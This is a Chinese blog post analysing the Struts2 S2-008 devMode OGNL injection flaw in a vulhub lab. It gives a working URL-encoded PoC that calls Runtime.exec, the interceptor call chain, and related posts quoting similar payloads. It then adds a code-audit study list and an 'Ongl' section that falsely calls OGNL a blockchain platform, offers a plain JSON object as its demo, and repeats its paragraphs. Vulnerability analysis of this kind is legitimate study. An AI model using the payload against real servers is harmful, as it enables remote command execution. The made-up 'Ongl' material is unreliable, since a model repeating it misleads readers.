S2 008 漏洞分析

已于 2023-10-20 17:34:47 修改
阅读量1.7k 收藏
点赞数
文章标签: java 开发语言
于 2023-05-25 18:14:46 首次发布
本文为博主原创文章,未经博主允许不得转载,未授权转载为侵权行为,违反法律。
本文链接:https://blog.csdn.net/qq_36869808/article/details/130872163
版权

0x00 前言

由于CSDN原力获取机制,所以基本上一天转过来一篇。

0x01 正文

1.环境

环境推荐vulhub,或者git上拉一个就行。

poc:

devmode.action
?debug=command
&expression=(%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean%28%22false%22%29%20%2C%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D%23foo%2C@java.lang.Runtime@getRuntime%28%29.exec%28%22calc%22%29)

2.漏洞分析

主要原理就是当s2开启devMode的时候,DebuggingInterceptor 回去检测debug参数是否为console,command,browser,在command,browser的时候会触发stack.findValue。

在这里插入图片描述
在这里插入图片描述这里按顺序分析即可,最后可以看到ognlUtil.getValue

在这里插入图片描述
接着就会进入ognl的操作

在这里插入图片描述最终的执行的位置:
在这里插入图片描述
最后贴上调用链:

getValueBody:53, ASTAssign (ognl)
evaluateGetValueBody:212, SimpleNode (ognl)
getValue:258, SimpleNode (ognl)
getValueBody:63, ASTSequence (ognl)
evaluateGetValueBody:212, SimpleNode (ognl)
getValue:258, SimpleNode (ognl)
getValue:494, Ognl (ognl)
getValue:458, Ognl (ognl)
getValue:213, OgnlUtil (com.opensymphony.xwork2.ognl)
getValueUsingOgnl:277, OgnlValueStack (com.opensymphony.xwork2.ognl)
tryFindValue:260, OgnlValueStack (com.opensymphony.xwork2.ognl)
tryFindValueWhenExpressionIsNotNull:242, OgnlValueStack (com.opensymphony.xwork2.ognl)
findValue:222, OgnlValueStack (com.opensymphony.xwork2.ognl)
findValue:284, OgnlValueStack (com.opensymphony.xwork2.ognl)
intercept:219, DebuggingInterceptor (org.apache.struts2.interceptor.debugging)
invoke:248, DefaultActionInvocation (com.opensymphony.xwork2)
intercept:145, ChainingInterceptor (com.opensymphony.xwork2.interceptor)
invoke:248, DefaultActionInvocation (com.opensymphony.xwork2)
doIntercept:171, PrepareInterceptor (com.opensymphony.xwork2.interceptor)
intercept:98, MethodFilterInterceptor (com.opensymphony.xwork2.interceptor)
invoke:248, DefaultActionInvocation (com.opensymphony.xwork2)
intercept:176, I18nInterceptor (com.opensymphony.xwork2.interceptor)
invoke:248, DefaultActionInvocation (com.opensymphony.xwork2)
intercept:164, ServletConfigInterceptor (org.apache.struts2.interceptor)
invoke:248, DefaultActionInvocation (com.opensymphony.xwork2)
intercept:190, AliasInterceptor (com.opensymphony.xwork2.interceptor)
invoke:248, DefaultActionInvocation (com.opensymphony.xwork2)
intercept:187, ExceptionMappingInterceptor (com.opensymphony.xwork2.interceptor)
invoke:248, DefaultActionInvocation (com.opensymphony.xwork2)
execute:52, StrutsActionProxy (org.apache.struts2.impl)
serviceAction:498, Dispatcher (org.apache.struts2.dispatcher)
doFilter:434, FilterDispatcher (org.apache.struts2.dispatcher)
internalDoFilter:235, ApplicationFilterChain (org.apache.catalina.core)
doFilter:206, ApplicationFilterChain (org.apache.catalina.core)
invoke:233, StandardWrapperValve (org.apache.catalina.core)
invoke:191, StandardContextValve (org.apache.catalina.core)
invoke:127, StandardHostValve (org.apache.catalina.core)
invoke:103, ErrorReportValve (org.apache.catalina.valves)
invoke:109, StandardEngineValve (org.apache.catalina.core)
service:293, CoyoteAdapter (org.apache.catalina.connector)
process:859, Http11Processor (org.apache.coyote.http11)
process:610, Http11Protocol$Http11ConnectionHandler (org.apache.coyote.http11)
run:503, JIoEndpoint$Worker (org.apache.tomcat.util.net)
run:748, Thread (java.lang)

以上

总结

代码审计的学习方法

以下是学习代码审计的方法:

  1. 学习编程语言:成为一名优秀的代码审计师,首先需要了解一些基本的编程知识。选择一种或多种编程语言进行深入了解,掌握它们的语法和编写代码的基本规则。

  2. 学习安全知识:为了成为一名优秀的代码审计师,还需要了解安全知识。这涉及到了解攻击者常用的攻击技术、常见漏洞、攻击技术等等。

  3. 学习常用安全工具:掌握一些常用的安全工具,如Burp Suite、OWASP Zap等,可以协助你更好地完成代码审计。

  4. 学习代码审计技术:了解代码审计的基本技术和步骤,包括代码分析、输入验证、输出编码、逻辑错误等。

  5. 实践:通过实践来提高自己的技能。你可以选择一些常见的开源软件来进行代码审计,也可以参与CTF比赛来不断锻炼自己的技能。

  6. 参与社区:加入一些安全论坛和社区,与其他安全专家交流经验和技术,寻求别人的建议和帮助。

以上是学习代码审计的常见方法,需要坚持实践和不断学习,才能成为一名出色的代码审计师。

Ongl

Ongl(Open Next Generation Ledger)是一个区块链平台,它致力于提供一个安全、高效和可扩展的去中心化应用开发和部署环境。Ongl采用了一种创新的共识算法,即Proof of Believability(PoB),这种算法既考虑了节点权重,又考虑了节点参与交易的可靠程度,从而保证了交易的安全性和公正性。Ongl的智能合约语言是基于C#语言的,这使得开发者可以非常容易地开发出智能合约,同时也支持与其他区块链平台的互操作性。Ongl还拥有一些独特的特性,例如侧链和闪电网络,它们可以使Ongl更加高效、可扩展和灵活。Ongl(Open Next Generation Ledger)是一个区块链平台,它致力于提供一个安全、高效和可扩展的去中心化应用开发和部署环境。Ongl采用了一种创新的共识算法,即Proof of Believability(PoB),这种算法既考虑了节点权重,又考虑了节点参与交易的可靠程度,从而保证了交易的安全性和公正性。Ongl的智能合约语言是基于C#语言的,这使得开发者可以非常容易地开发出智能合约,同时也支持与其他区块链平台的互操作性。Ongl还拥有一些独特的特性,例如侧链和闪电网络,它们可以使Ongl更加高效、可扩展和灵活。

Demo

一个Ongl的例子是:

{ 
  "name": "John",
  "age": 30,
  "city": "New York",
  "hobbies": ["reading", "sports"],
  "address": {
    "street": "123 Main St",
    "zip": "10001"
  }
}

这是一个表示一个人的Ongl对象。它有一个名字(name),年龄(age),城市(city),爱好(hobbies)和地址(address)。地址是一个嵌套对象,它包含街道和邮政编码。爱好是一个字符串数组,它列出了这个人的兴趣爱好。这个Ongl对象可以用来描述一个人的基本信息。一个Ongl的例子是:

{ 
  "name": "John",
  "age": 30,
  "city": "New York",
  "hobbies": ["reading", "sports"],
  "address": {
    "street": "123 Main St",
    "zip": "10001"
  }
}

这是一个表示一个人的Ongl对象。它有一个名字(name),年龄(age),城市(city),爱好(hobbies)和地址(address)。地址是一个嵌套对象,它包含街道和邮政编码。爱好是一个字符串数组,它列出了这个人的兴趣爱好。这个Ongl对象可以用来描述一个人的基本信息。

王嘟嘟_
关注
vulhub-struts2-S2-008 远程代码执行漏洞复现
qq_56426046的博客
06-19 502
影响版本: 2.1.0 - 2.3.1。
【vulhub】S2-008漏洞复现
qq_45300786的博客
07-08 438
poc http://192.168.100.23:8080/devmode.action?debug=command&expression=%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23_memberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true
struts-s2-008 代码执行 (CVE-2012-0391)
qq_23003811的博客
07-16 214
Cookie 拦截器错误配置可造成 OGNL 表达式执行,S2-008 涉及多个漏洞,Cookie 拦截器错误配置可造成 OGNL 表达式执行,但是由于大多 Web 容器(如 Tomcat)对 Cookie 名称都有字符限制,一些关键字符无法使用使得这个点显得比较鸡肋。另一个比较鸡肋的点就是在 struts2 应用开启 devMode 模式后会有多个调试接口能够直接查看对象信息或直接执行命令。通过修改whoami达到任意命令执行。
S2-008 &S2-009 远程代码执行漏洞检测与利用
Fly_鹏程万里
12-14 4202
前言 漏洞环境改自vulhub https://github.com/kingkaki/Struts2-Vulenv S2-008 漏洞信息 https://cwiki.apache.org/confluence/display/WW/S2-008 主要是利用对传入参数没有严格限制,导致多个地方可以执行恶意代码 第一种情况其实就是S2-007,在异常处理时的OGNL执行 第二...
s2系列——s2-007,s2-008,s2-009复现
qq_54030686的博客
03-02 4788
s2-007,s2-008,s2-009复现 简而言之就是payload的输入,具体复现这里不再复现,相关博文,也有蛮多,这里更新下脚本 s2-007 def s2007(url): try: proxy = '192.168.43.74:8080' # 本地代理 proxies = { 'http': 'http://' + proxy, 'https': 'https://' + proxy }
s2-008远程代码执行漏洞
Stephen Wolf
11-18 2073
一、漏洞描述: S2-008 涉及多个漏洞,Cookie 拦截器错误配置可造成 OGNL 表达式执行,但是由于大多 Web 容器(如 Tomcat)对 Cookie 名称都有字符限制,一些关键字符无法使用使得这个点显得比较鸡肋。另一个比较鸡肋的点就是在 struts2 应用开启 devMode 模式后会有多个调试接口能够直接查看对象信息或直接执行命令,正如 kxlzx 所提这种情...
Struts2-S2-029漏洞分析1
08-08
Struts2-S2-029漏洞是一个严重的问题,它涉及到OGNL(Object-Graph Navigation Language)表达式在Struts2框架中的不安全处理。此漏洞的根本原因是开发人员在处理OGNL表达式中的赋值操作时,错误地编写了判断条件,...
Struts2远程代码执行漏洞分析S2-013)1
08-08
Struts2 远程代码执行漏洞分析S2-013) Struts2 是 Apache 官方的产品,最近出了一个远程代码执行漏洞,编号“S2-013”,目前是 0DAY,官方没有修补方案出现。这个漏洞出现在 includeParams 属性中,允许远程命令...
Struts2 S2-033漏洞分析1
08-08
Struts2 S2-033漏洞分析 Struts2 是一个基于 Java Web 应用程序的框架,它的下一代产品 Struts 2 是在 Struts 1 和 WebWork 的技术基础上进行了合并的全新的框架。Struts 2 的体系结构与 Struts 1 的体系结构差别...
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞S2-008 (CVE-2012-0391)
qq_51577576的博客
10-15 1122
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞S2-008 (CVE-2012-0391) S2-008 涉及多个漏洞,主要利用对传入参数没有严格限制,导致多个地方可以执行恶意代码。 第一种情况其实就是 S2-007,在异常处理时的OGNL 执行第二种的cookie的方式,虽然在struts2没有对恶意代码进行限制,但是java的webserver(Tomcat),对cookie 的名称有较多限制,在传入struts2之前就被处理,从而较为鸡肋第三种需要开启devModedebug 模式。
CVE-2019-0230 s2-059 漏洞分析1
08-03
CVE-2019-0230 s2-059 漏洞分析 Apache Struts 框架中的 CVE-2019-0230 漏洞是远程代码执行(RCE)漏洞,影响范围为 Struts 2.0.0 - Struts 2.5.20。官方建议升级到 2.5.22 或更高版本。该漏洞的成因是 Struts 框架...
【研究】Struts2漏洞S2-008漏洞环境和可用回显POC
god_Zeo的安全博客
07-01 3282
【研究】Struts2漏洞S2-008漏洞环境和可用POC1.环境2.原理3.影响版本4.利用过程POC有效POC’’POC注意 1.环境 环境 https://github.com/vulhub/vulhub/blob/master/README.zh-cn.md 这个搭环境很方便快捷,具体可以看说明,很简单 2.原理 参考 http://rickgray.me/2016/05/06/revi...
S2-008漏洞复现
baidu_38844729的博客
11-14 892
环境搭建 使用docker进行漏洞环境搭建,有关docker的安装和镜像部署可以参考我前面的博客 docker-compose build docker-compose up -d 漏洞利用 命令执行EXP http://localhost:8080/devmode.action?debug=command&expression=%23context%5B%22xwork.Method...
洞态IAST自动检测S2-008漏洞
weixin_40418457的博客
04-30 359
一、使用Dongtai-IAST检测S2-008漏洞 1. 启动在线靶场 登陆在线靶场:http://labs.iast.huoxian.cn:8081,启动S2-008环境,等待环境启动之后,点击访问靶场按钮即可前往靶场环境。该环境来源于vulhub和vulapps 2. 登陆**洞态IAST**网站:http://iast.huoxian.cn:8000/,查看漏洞检测结果 3. 进入搜索功能,分析完整的污点调用图 3.1 Source点 首先,在org.apache.struts2.dispatc
工厂模式的介绍及实现
最新发布
户伟伟的博客
09-25 73
工厂模式(Factory Pattern)是一种创建型设计模式,提供了一种创建对象的接口,而无需显式指定对象的具体类。在这种模式中,我们通过定义一个工厂类,专门负责生产各种类型的对象,这样我们可以避免直接在代码中实例化具体类,使代码更具扩展性、灵活性和维护性。解耦:客户端代码与具体的类解耦,避免了对象创建逻辑的重复。简化对象创建:通过工厂统一管理对象的创建逻辑,使代码更清晰易懂。扩展性强:新增类时,只需在工厂中增加创建逻辑,而不必修改现有的业务代码。
Java Stream流编程入门
2301_77207909的博客
09-21 494
Java StreamAPI的使用与常用方法
智能BI平台项目
2302_79400545的博客
09-22 204
BI商业智能:数据可视化、报表可视化系统。
Java Alibaba Druid 数据库连接池
miracle的专栏
09-24 693
Java开发中,数据库连接池是性能优化的重要一环。而作为一款强大的数据库连接池解决方案,凭借其和对多种数据库的支持,成为了许多企业级应用的首选。本篇文章将介绍Druid的核心特性,并结合不同数据库的实际用法。
Struts2漏洞分析S2-008与稳定Payload探讨
0×01 S2-008漏洞分析 S2-008漏洞主要涉及到Struts2开发模式(devmode)。在开发模式下,框架提供了一个DebuggingInterceptor,方便开发者进行调试。然而,如果不正确地配置或启用这个模式,恶意用户可能能够通过...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

王嘟嘟_

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值